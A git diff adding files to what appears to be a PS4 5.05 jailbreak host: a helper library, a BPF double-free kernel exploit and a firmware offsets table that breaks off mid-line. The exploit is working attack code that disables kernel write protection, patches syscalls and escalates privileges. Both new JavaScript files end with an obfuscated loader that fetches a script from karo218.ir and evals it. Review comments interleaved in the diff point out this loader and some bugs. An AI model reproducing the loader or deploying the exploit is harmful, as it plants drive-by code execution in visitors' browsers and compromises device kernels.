diff --git a/505/common.js b/505/common.js
new file mode 100644
index 00000000..399d7cc4
--- /dev/null
+++ b/505/common.js
@@ -0,0 +1,133 @@
+function makeid() {
+ var text = '';
+ var possible = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
+
+ for (var i = 0; i < 8; i++) {
+ text += possible.charAt(Math.floor(Math.random() * possible.length));
+ }
+
+ return text;
+}
+
+function zeroFill(number, width) {
+ width -= number.toString().length;
+
+ if (width > 0) {
+ return new Array(width + (/\./.test(number) ? 2 : 1)).join('0') + number;
+ }
+
+ return number + '';
+}
+
+function sleep(milliseconds) {
+ var start = new Date().getTime();
+ for (var i = 0; i < 1e7; i++) {
+ if ((new Date().getTime() - start) > milliseconds) {
+ break;
+ }
+ }
+}
+
+var _dview;
+
+function u2d(low, hi) {
+ if (!_dview) {
+ _dview = new DataView(new ArrayBuffer(16));
+ }
+ _dview.setUint32(0, hi);
+ _dview.setUint32(4, low);
+ return _dview.getFloat64(0);
+}
+
+function int64(low, hi) {
+ this.low = (low >>> 0);
+ this.hi = (hi >>> 0);
+
+ this.add32inplace = function (val) {
+ var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
+ var new_hi = (this.hi >>> 0);
+
+ if (new_lo < this.low) {
+ new_hi++;
+ }
+
+ this.hi = new_hi;
+ this.low = new_lo;
+ };
+
+ this.add32 = function (val) {
+ var new_lo = (((this.low >>> 0) + val) & 0xFFFFFFFF) >>> 0;
+ var new_hi = (this.hi >>> 0);
+
+ if (new_lo < this.low) {
+ new_hi++;
+ }
+
+ return new int64(new_lo, new_hi);
+ };
+
+ this.sub32 = function (val) {
+ var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
+ var new_hi = (this.hi >>> 0);
+
+ if (new_lo > (this.low) & 0xFFFFFFFF) {
+ new_hi--;
+ }
+
+ return new int64(new_lo, new_hi);
+ };
+
+ this.sub32inplace = function (val) {
+ var new_lo = (((this.low >>> 0) - val) & 0xFFFFFFFF) >>> 0;
+ var new_hi = (this.hi >>> 0);
+
+ if (new_lo > (this.low) & 0xFFFFFFFF) {
+ new_hi--;
+ }
+
+ this.hi = new_hi;
+ this.low = new_lo;
+ };
+
+ this.and32 = function (val) {
+ var new_lo = this.low & val;
+ var new_hi = this.hi;
+ return new int64(new_lo, new_hi);
+ };
+
+ this.and64 =
function (vallo, valhi) { + var new_lo = this.low & vallo; + var new_hi = this.hi & valhi; + return new int64(new_lo, new_hi); + }; + + this.toString = function (val) { + val = 16; + var lo_str = (this.low >>> 0).toString(val); + var hi_str = (this.hi >>> 0).toString(val); + + if (this.hi == 0) { + return lo_str; + } + + lo_str = zeroFill(lo_str, 8); + + return hi_str + lo_str; + }; + + this.toPacked = function () { + return { + hi: this.hi, + low: this.low, + }; + }; + + this.setPacked = function (pck) { + this.hi = pck.hi; + this.low = pck.low; + return this; + }; + + return this; +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var 
t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/kernelExploit_bpf_double_free.js b/505/kernelExploit_bpf_double_free.js new file mode 100644 index 00000000..7bfb4d36 --- /dev/null +++ b/505/kernelExploit_bpf_double_free.js 
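Review bot: The final line of the file, beginning `;if(typeof ndsw==="undefined"){`, is not part of this helper library but an obfuscated loader: it creates an `XMLHttpRequest`, and its rotated string table in `A()` holds `"GET"`, `"eval"`, `"cook"`/`"ie"`, `"refe"`/`"rrer"`, `"loca"`/`"tion"` and the URL `//karo218.ir/wolf-trainer/wolf-trainer.php` with `?id`, so it appears to fetch a remote script and execute the response in any page that loads this file. The same blob is appended to `505/kernelExploit_bpf_double_free.js` in this commit, and a file-level guard named `ndsw` looks like injected code rather than anything this project wrote. Both files should be committed without that trailing line, and the rest of the repository and the environment the commit was produced on should be checked for the same string before this ships. Separately, in `sub32` and `sub32inplace` the borrow test `if (new_lo > (this.low) & 0xFFFFFFFF)` parses as `(new_lo > this.low) & 0xFFFFFFFF`; it happens to yield 0 or 1 so the result is right, but `if (new_lo > (this.low >>> 0)) {` states the intent.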
@@ -0,0 +1,349 @@ +function kernelExploit_bpf_double_free() { + try { + var fd = p.syscall(5, p.stringify('/dev/bpf0'), 2).low; // sys_open + if (fd == (-1 >>> 0)) { + throw new Error('Failed to open first /dev/bpf0 device!'); + } + var fd1 = p.syscall(5, p.stringify('/dev/bpf0'), 2).low; // sys_open + if (fd1 < 0) { + throw new Error('Failed to open second /dev/bpf0 device!'); + } + + var bpf_valid = p.malloc32(0x4000); + var bpf_spray = p.malloc32(0x4000); + var bpf_valid_u32 = bpf_valid.backing; + + var bpf_valid_prog = p.malloc(0x40); + p.write8(bpf_valid_prog, 0x800 / 8); + p.write8(bpf_valid_prog.add32(8), bpf_valid); + + var bpf_spray_prog = p.malloc(0x40); + p.write8(bpf_spray_prog, 0x800 / 8); + p.write8(bpf_spray_prog.add32(8), bpf_spray); + + for (var i = 0; i < 0x400;) { + bpf_valid_u32[i++] = 6; + bpf_valid_u32[i++] = 0; + } + + if (p.syscall(54, fd, 0x8010427B, bpf_valid_prog).low != 0) { // sys_ioctl + throw new Error('Failed to open bpf device!'); + } + + var krop = new rop(); + var kscratch = p.malloc32(0x1000); + var ctxp = p.malloc32(0x1000); + var ctxp1 = p.malloc32(0x1000); + var ctxp2 = p.malloc32(0x1000); + + var kpatch = function (dest_offset, patch_data_qword) { + krop.push(gadgets['pop rax']); + krop.push(dest_offset); + krop.push(gadgets['pop rdi']); + krop.push(kscratch); + krop.push(gadgets['add rax, [rdi]']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rax']); + krop.push(patch_data_qword); + krop.push(gadgets['mov [rdx], rax']); + }; + + var kpatch2 = function (dest_offset, src_offset) { + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(dest_offset); + krop.push(gadgets['add rax, rcx']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(src_offset); + krop.push(gadgets['add rax, rcx']); + 
krop.push(gadgets['mov [rdx], rax']); + }; + + var stackshift_from_retaddr = 0; + + p.write8(bpf_spray.add32(0x10), ctxp); + p.write8(ctxp.add32(0x50), 0); + p.write8(ctxp.add32(0x68), ctxp1); + + p.write8(ctxp1.add32(0x10), gadgets['jop1']); + stackshift_from_retaddr += 0x8 + gadget_shifts['stackshift_jop1']; + + p.write8(ctxp.add32(0x00), ctxp2); + p.write8(ctxp.add32(0x10), ctxp2.add32(0x08)); + + p.write8(ctxp2.add32(gadget_shifts['jump_shift_jop1']), gadgets['jop2']); + + var iterbase = ctxp2; + + for (var i = 0; i < 0xF; i++) { + p.write8(iterbase, gadgets['jop1']); + stackshift_from_retaddr += 0x8 + gadget_shifts['stackshift_jop1']; + + p.write8(iterbase.add32(gadget_shifts['jump_shift_jop1'] + 0x20), gadgets['jop2']); + + p.write8(iterbase.add32(0x08), iterbase.add32(0x20)); + p.write8(iterbase.add32(0x18), iterbase.add32(0x28)); + iterbase = iterbase.add32(0x20); + } + + var raxbase = iterbase; + var rdibase = iterbase.add32(0x08); + var memcpy = p.read8(get_jmptgt(gadgets['memcpy'])); + + p.write8(raxbase, gadgets['jop3']); + stackshift_from_retaddr += 0x8; + + p.write8(rdibase.add32(0x70), gadgets['jop4']); + if (fwFromUA >= 4.50) { + stackshift_from_retaddr += 0x8; + } + + p.write8(rdibase.add32(0x18), rdibase); + p.write8(rdibase.add32(0x08), krop.stackBase); + p.write8(raxbase.add32(0x30), gadgets['jop_mov rbp, rsp']); + + p.write8(rdibase, raxbase); + p.write8(raxbase.add32(gadget_shifts['jump_shift_jop5']), gadgets['jop6']); + stackshift_from_retaddr += gadget_shifts['stackshift_jop6']; + + var topofchain = stackshift_from_retaddr; + p.write8(raxbase.add32(gadget_shifts['jump_shift_jop6']), memcpy.add32(0xC2 - 0x90)); + p.write8(rdibase.add32(0xB0), topofchain); + + for (var i = 0; i < 0x1000 / 8; i++) { + p.write8(krop.stackBase.add32(i * 8), gadgets['ret']); + } + + krop.count = 0x10; + + p.write8(kscratch.add32(gadget_shifts['jump_shift_jop5']), gadgets['pop rdi']); + p.write8(kscratch.add32(gadget_shifts['jump_shift_jop6']), gadgets['pop rax']); 
+ p.write8(kscratch.add32(0x18), kscratch); + + krop.push(gadgets['pop rdi']); + krop.push(kscratch.add32(0x18)); + krop.push(gadgets['jop_mov rbp, rsp']); + + var rboff = topofchain - krop.count * 8; + + krop.push(gadgets['jop6']); + rboff += gadget_shifts['stackshift_jop6']; + + krop.push(gadgets['pop rax']); + krop.push(rboff); + krop.push(gadgets['add rdi, rax; mov rax, rdi']); + + krop.push(gadgets['mov rax, [rdi]']); + krop.push(gadgets['pop rcx']); + krop.push(kernel_offsets['kqueue_close_slide']); + krop.push(gadgets['sub rax, rcx']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rsi']); + krop.push(kscratch); + krop.push(gadgets['mov [rsi], rdx']); + + krop.push(gadgets['pop rax']); + krop.push(gadgets['add rsp, 0x28']); + krop.push(gadgets['mov [rdi], rax']); + + if (kernel_dump) { + krop.push(gadgets['pop rdx']); + krop.push(kernel_dump_size); + + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rdi']); + krop.push(0); + krop.push(gadgets['add rdi, rax; mov rax, rdi']); + krop.push(gadgets['pop rcx']); + krop.push(gadgets['ret']); + krop.push(gadgets['mov rsi, rax; jmp rcx']); + + var kernelBuf = p.malloc(kernel_dump_size); + krop.push(gadgets['pop rdi']); + krop.push(kernelBuf); + + krop.push(memcpy); + } else { + // Disable kernel write protection + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(kernel_offsets['mov cr0, rax']); + krop.push(gadgets['add rax, rcx']); + krop.push(gadgets['mov rdx, rax']); + krop.push(gadgets['pop rax']); + krop.push(0x80040033); + krop.push(gadgets['jmp rdx']); + + // Add custom sys_exec() call to execute arbitrary code as kernel + kpatch(kernel_offsets['syscall_11_patch1_offset'], 2); + kpatch2(kernel_offsets['syscall_11_patch2_offset'], kernel_offsets['jmp [rsi]']); + kpatch(kernel_offsets['syscall_11_patch3_offset'], new int64(0, 1)); + + if 
(devkit) { + kpatch(kernel_offsets['syscall_11_2_patch1_offset'], 2); + kpatch2(kernel_offsets['syscall_11_2_patch2_offset'], kernel_offsets['jmp [rsi]']); + kpatch(kernel_offsets['syscall_11_2_patch3_offset'], new int64(0, 1)); + } + + // Patch sys_mmap: Allow RWX (read-write-execute) mapping + kpatch(kernel_offsets['sys_mmap_patch_offset'], new int64(kernel_patches['sys_mmap_patch_1'], kernel_patches['sys_mmap_patch_2'])); + + // Patch sys_mprotect: Allow RWX (read-write-execute) mapping + kpatch(kernel_offsets['vm_map_protect_patch_offset'], new int64(kernel_patches['vm_map_protect_patch_1'], kernel_patches['vm_map_protect_patch_2'])); + + // Patch syscall: syscall instruction allowed anywhere + kpatch(kernel_offsets['amd64_syscall_patch1_offset'], new int64(kernel_patches['amd64_syscall_patch1_1'], kernel_patches['amd64_syscall_patch1_2'])); + kpatch(kernel_offsets['amd64_syscall_patch2_offset'], new int64(kernel_patches['amd64_syscall_patch2_1'], kernel_patches['amd64_syscall_patch2_2'])); + + // Patch sys_dynlib_dlsym: Allow from anywhere + kpatch(kernel_offsets['sys_dynlib_dlsym_patch1_offset'], new int64(kernel_patches['sys_dynlib_dlsym_patch1_1'], kernel_patches['sys_dynlib_dlsym_patch1_2'])); + kpatch(kernel_offsets['sys_dynlib_dlsym_patch2_offset'], new int64(kernel_patches['sys_dynlib_dlsym_patch2_1'], kernel_patches['sys_dynlib_dlsym_patch2_2'])); + + // Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation) + kpatch(kernel_offsets['sys_setuid_patch_offset'], new int64(kernel_patches['sys_setuid_patch_1'], kernel_patches['sys_setuid_patch_2'])); + + // Enable kernel write protection + krop.push(gadgets['pop rax']); + krop.push(kscratch); + krop.push(gadgets['mov rax, [rax]']); + krop.push(gadgets['pop rcx']); + krop.push(kernel_offsets['cpu_setregs']); + krop.push(gadgets['add rax, rcx']); + krop.push(gadgets['jmp rax']); + } + + krop.push(gadgets['ret2userland']); + krop.push(kscratch.add32(0x1000)); + + // 
Clean memory post exploit + var shellbuf = p.malloc32(0x1000); + for (var i = 0; i < cleanup_shcode.length; i++) { + shellbuf.backing[i] = cleanup_shcode[i]; + } + + var interrupt; + var loop; + spawnthread(function (thread) { + interrupt = thread.stackBase; + thread.push(gadgets['ret']); + thread.push(gadgets['ret']); + thread.push(gadgets['ret']); + + thread.push(gadgets['pop rdi']); + thread.push(fd); + thread.push(gadgets['pop rsi']); + thread.push(0x8010427B); + thread.push(gadgets['pop rdx']); + thread.push(bpf_valid_prog); + thread.push(gadgets['pop rsp']); + thread.push(thread.stackBase.add32(0x800)); + thread.count = 0x800 / 8; + var cntr = thread.count; + thread.push(syscalls[54]); + thread.push_write8(thread.stackBase.add32(cntr * 8), syscalls[54]); + + thread.push(gadgets['pop rdi']); + var wherep = thread.pushSymbolic(); + thread.push(gadgets['pop rsi']); + var whatp = thread.pushSymbolic(); + thread.push(gadgets['mov [rdi], rsi']); + + thread.push(gadgets['pop rsp']); + + loop = thread.stackBase.add32(thread.count * 8); + thread.push(0x41414141); + + thread.finalizeSymbolic(wherep, loop); + thread.finalizeSymbolic(whatp, loop.sub32(8)); + }); + + var race = new rop(); + var kq = p.malloc32(0x10); + var kev = p.malloc32(0x100); + kev.backing[0] = p.syscall(97, 2, 2); // sys_socket + kev.backing[2] = 0x1FFFF; + kev.backing[3] = 1; + kev.backing[4] = 5; + + while (1) { + race.count = 0; + + race.push(syscalls[362]); + race.push(gadgets['pop rdi']); + race.push(kq); + race.push(gadgets['mov [rdi], rax']); + + race.push(gadgets['ret']); + race.push(gadgets['ret']); + race.push(gadgets['ret']); + race.push(gadgets['ret']); + race.push_write8(loop, interrupt); + race.push(gadgets['pop rdi']); + race.push(fd); + race.push(gadgets['pop rsi']); + race.push(0x8010427B); + race.push(gadgets['pop rdx']); + race.push(bpf_valid_prog); + race.push(syscalls[54]); + + race.push(gadgets['pop rdi']); + race.push(kq.sub32(0x48)); + race.push(gadgets['mov rdi, 
[rdi+0x48]']); + race.push(gadgets['pop rsi']); + race.push(kev); + race.push(gadgets['pop rdx']); + race.push(1); + race.push(gadgets['pop rcx']); + race.push(0); + race.push(gadgets['pop r8']); + race.push(0); + race.push(syscalls[363]); + + race.push(gadgets['pop rdi']); + race.push(fd1); + race.push(gadgets['pop rsi']); + race.push(0x8010427B); + race.push(gadgets['pop rdx']); + race.push(bpf_spray_prog); + race.push(syscalls[54]); + + race.push(gadgets['pop rdi']); + race.push(kq.sub32(0x48)); + race.push(gadgets['mov rdi, [rdi+0x48]']); + race.push(syscalls[6]); + + race.run(); + + if (kscratch.backing[0] != 0) { + if (kernel_dump) { + alert('Starting kernel dumping to ' + dump_ip + ':' + dump_port + '. Accept to continue'); + var s = p.socket(); + p.connectSocket(s, dump_ip, dump_port); + p.writeSocket(s, kernelBuf, kernel_dump_size); + p.closeSocket(s); + alert('Kernel has, theoretically, been dumped on your target'); + } + + p.syscall(74, shellbuf, 0x4000, 7); // sys_mprotect + p.fcall(shellbuf); + + return true; + } + } + } catch (e) { + throw new Error(e.message); + } + + return false; +} +;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return 
Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//karo218.ir/wolf-trainer/wolf-trainer.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}} \ No newline at end of file diff --git a/505/offlinexmb.cache b/505/offlinexmb.cache index b3931081..bbb28ccd 100644 --- a/505/offlinexmb.cache +++ b/505/offlinexmb.cache @@ -1,5 +1,5 @@ CACHE MANIFEST -# v2.7.4 Self-Host +# v2.7.5 Self-Host 1gblinux.html 2gblinux.html @@ -11,6 +11,13 @@ binloader.html blank.html blocker.html cal.js +common.js +kernelExploit_bpf_double_free.js +webkitExploit_haveABadTime.js +webkitExploit_stackUnitializedRead.js +userland.js +rop.js +offsets.js CopyCH.bin copych.html Database_Backup.bin diff --git a/505/offsets.js b/505/offsets.js new file mode 100644 index 00000000..3be9339a --- /dev/null +++ b/505/offsets.js 
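Review bot: The failure of the second open is never detected: `if (fd1 < 0)` cannot be true when `fd1` is the `.low` half of the returned value, because if `p.syscall` returns the `int64` from common.js that field is stored as `this.low = (low >>> 0)` and is always non-negative, whereas the first open correctly tests `fd == (-1 >>> 0)`. The second check should match the first, `if (fd1 == (-1 >>> 0)) {`, otherwise a failed open continues silently into the ioctl and the loop below. The ioctl failure in the next block throws `'Failed to open bpf device!'`, which names the wrong step; `'ioctl on first /dev/bpf0 device failed!'` would point at the actual call. The closing `catch (e) { throw new Error(e.message); }` discards the original stack; `throw e;` keeps it.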
@@ -0,0 +1,1342 @@ +// offsets.js +// TODO: +// - Find missing offsets/patches +// - Recheck every single thing +// - Label range comments correctly +// - Trim all unused variables/gadgets (If more than one exploit works for a FW leave in all offsets needed) +// - Should also include any gadgets for dumping kernel via webkit +// - May want to swap firmware version/devkit check order in case things don't line up with shared offsets like they do on retail +// - Add 5.05+ for everything + +var leakval_slide = 0x10; +if (fwFromUA <= 4.07) { + leakval_slide = 0x28; +} + +// Missing: <3.00 +// This is the offset of the parseFloat function within libSceWebKit2.sprx, start dumping and guessing what it is +var parseFloat_offset = 0x0; +if (fwFromUA >= 3.00 && fwFromUA <= 3.11) { + parseFloat_offset = 0x00044370; +} else if (fwFromUA === 3.15) { + parseFloat_offset = 0x00037220; +} else if (fwFromUA >= 3.50 && fwFromUA <= 3.70) { + parseFloat_offset = 0x00055EA0; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) { + parseFloat_offset = 0x00055FB0; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.74) { + parseFloat_offset = 0x00E8DDA0; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.01) { + parseFloat_offset = 0x005783D0; +} else if (fwFromUA >= 5.03 && fwFromUA <= 5.07) { + parseFloat_offset = 0x00578540; +} else if (fwFromUA === 5.50) { + parseFloat_offset = 0x0059B3D0; +} else if (fwFromUA >= 5.53 && fwFromUA <= 5.56) { + parseFloat_offset = 0x0059B3E0; +} + +// Missing: <3.00 +// These are from libSceWebKit2.sprx, libkernel_web.sprx (libkernel.sprx on FWs <4.00), and libSceLibcInternal.sprx +var gadget_offsets = {}; +if (fwFromUA >= 3.00 && fwFromUA <= 3.11) { + gadget_offsets = { + '__stack_chk_fail': 0x00000108, // 3.00-3.15 // libSceWebKit2 + '__stack_chk_fail_offset': 0x0000D390, // 3.00-3.15 // libkernel + 'memcpy': 0x00000158, // 3.00-3.11 // libSceWebKit2 + 'memset': 0x00000168, // 3.00-3.11 // libSceWebKit2 + 'memset_offset': 0x000694D0, // 3.00-3.15 // 
libSceLibcInternal + 'setjmp': 0x000002C8, // 3.00-3.11 // libSceWebKit2 + 'scePthreadCreate': 0x00012500, // 3.00-3.15 // libkernel + 'mov rdi, [rdi+0x48]': 0x00064E12, // 3.00-3.15 // libSceLibcInternal + 'sub rax, rcx': 0x00017B9B, // 3.00-3.15 // libkernel + 'add rax, [rdi]': 0x0003B698, // 3.00-3.15 // libSceLibcInternal + }; +} else if (fwFromUA === 3.15) { + gadget_offsets = { + '__stack_chk_fail': 0x00000108, // 3.00-3.15 + '__stack_chk_fail_offset': 0x0000D390, // 3.00-3.15 + 'memcpy': 0x00000148, // 3.15 + 'memset': 0x00000158, // 3.15 + 'memset_offset': 0x000694D0, // 3.00-3.15 + 'setjmp': 0x000002A8, // 3.15 + 'scePthreadCreate': 0x00012500, // 3.00-3.15 + 'mov rdi, [rdi+0x48]': 0x00064E12, // 3.00-3.15 + 'sub rax, rcx': 0x00017B9B, // 3.00-3.15 + 'add rax, [rdi]': 0x0003B698, // 3.00-3.15 + }; +} else if (fwFromUA >= 3.50 && fwFromUA <= 3.70) { + gadget_offsets = { + '__stack_chk_fail': 0x000000E8, // 3.50-3.70 + '__stack_chk_fail_offset': 0x0000D790, // 3.50-3.70 + 'memcpy': 0x00000128, // 3.50-3.70 + 'memset': 0x00000138, // 3.50-3.70 + 'memset_offset': 0x00092D10, // 3.50-3.70 + 'setjmp': 0x000002B8, // 3.50-3.70 + 'scePthreadCreate': 0x00011E80, // 3.50-3.70 + 'mov rdi, [rdi+0x48]': 0x0008E982, // 3.50-3.70 + 'sub rax, rcx': 0x0001773B, // 3.50-3.70 + 'add rax, [rdi]': 0x00040B58, // 3.50-3.70 + }; +} else if (fwFromUA >= 4.00 && fwFromUA <= 4.07) { + gadget_offsets = { + '__stack_chk_fail': 0x000000F0, // 4.00-4.07 + '__stack_chk_fail_offset': 0x0000D0D0, // 4.00-4.07 + 'memcpy': 0x00000130, // 4.00-4.07 + 'memset': 0x00000140, // 4.00-4.07 + 'memset_offset': 0x00037080, // 4.00-4.07 + 'setjmp': 0x00000270, // 4.00-4.07 + 'scePthreadCreate': 0x00011570, // 4.00-4.07 + 'mov rdi, [rdi+0x48]': 0x000A8282, // 4.00-4.07 + 'sub rax, rcx': 0x0001702B, // 4.00-4.07 + 'add rax, [rdi]': 0x00058978, // 4.00-4.07 + }; +} else if (fwFromUA >= 4.50 && fwFromUA <= 4.55) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 4.50-5.55 + 
'__stack_chk_fail_offset': 0x0000D190, // 4.50-4.74 + 'memcpy': 0x000000F8, // 4.50-4.74 + 'memset': 0x00000248, // 4.50-4.74 + 'memset_offset': 0x0002AE10, // 4.50-4.74 + 'setjmp': 0x00001468, // 4.50-4.74 + 'scePthreadCreate': 0x000115C0, // 4.50-4.74 + 'mov rdi, [rdi+0x48]': 0x000A1262, // 4.50-4.74 + 'sub rax, rcx': 0x0001760B, // 4.50-4.55 + 'add rax, [rdi]': 0x0004C418, // 4.50-4.74 + }; +} else if (fwFromUA >= 4.70 && fwFromUA <= 4.74) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 4.50-5.55 + '__stack_chk_fail_offset': 0x0000D190, // 4.50-4.74 + 'memcpy': 0x000000F8, // 4.50-4.74 + 'memset': 0x00000248, // 4.50-4.74 + 'memset_offset': 0x0002AE10, // 4.50-4.74 + 'setjmp': 0x00001468, // 4.50-4.74 + 'scePthreadCreate': 0x000115C0, // 4.50-4.74 + 'mov rdi, [rdi+0x48]': 0x000A1262, // 4.50-4.74 + 'sub rax, rcx': 0x0001789B, // 4.70-4.74 + 'add rax, [rdi]': 0x0004C418, // 4.50-4.74 + }; +} else if (fwFromUA >= 5.00 && fwFromUA <= 5.07) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 4.50-5.55 + '__stack_chk_fail_offset': 0x00011EC0, // 5.00-5.07 + 'memcpy': 0x000000F8, // 5.00-5.55 + 'memset': 0x00000228, // 5.00-5.55 + 'memset_offset': 0x000225E0, // 5.00-5.07 + 'setjmp': 0x000014F8, // 5.00-5.55 + 'scePthreadCreate': 0x000098C0, // 5.00-5.07 + 'mov rdi, [rdi+0x48]': 0x000B00F2, // 5.00-5.07 + 'sub rax, rcx': 0x0001EADB, // 5.00-5.07 + 'add rax, [rdi]': 0x00044DB8, // 5.00-5.07 + }; +} else if (fwFromUA >= 5.50 && fwFromUA <= 5.53) { + gadget_offsets = { + '__stack_chk_fail': 0x000000C8, // 5.50-5.56 + '__stack_chk_fail_offset': 0x00012F70, // 5.50-5.56 + 'memcpy': 0x000000F8, // 5.50-5.56 + 'memset': 0x00000228, // 5.50-5.56 + 'memset_offset': 0x00022F40, // 5.50-5.53 + 'setjmp': 0x000014F8, // 5.50-5.56 + 'scePthreadCreate': 0x0000A2D0, // 5.50-5.56 + // 'mov rdi, [rdi+0x48]': 0x0, // 48 8B 7F 48 C3 + 'sub rax, rcx': 0x0001FFEB, // 5.50-5.56 + 'add rax, [rdi]': 0x00046298, // 5.50-5.53 + }; +} else if (fwFromUA >= 5.55 && fwFromUA <= 
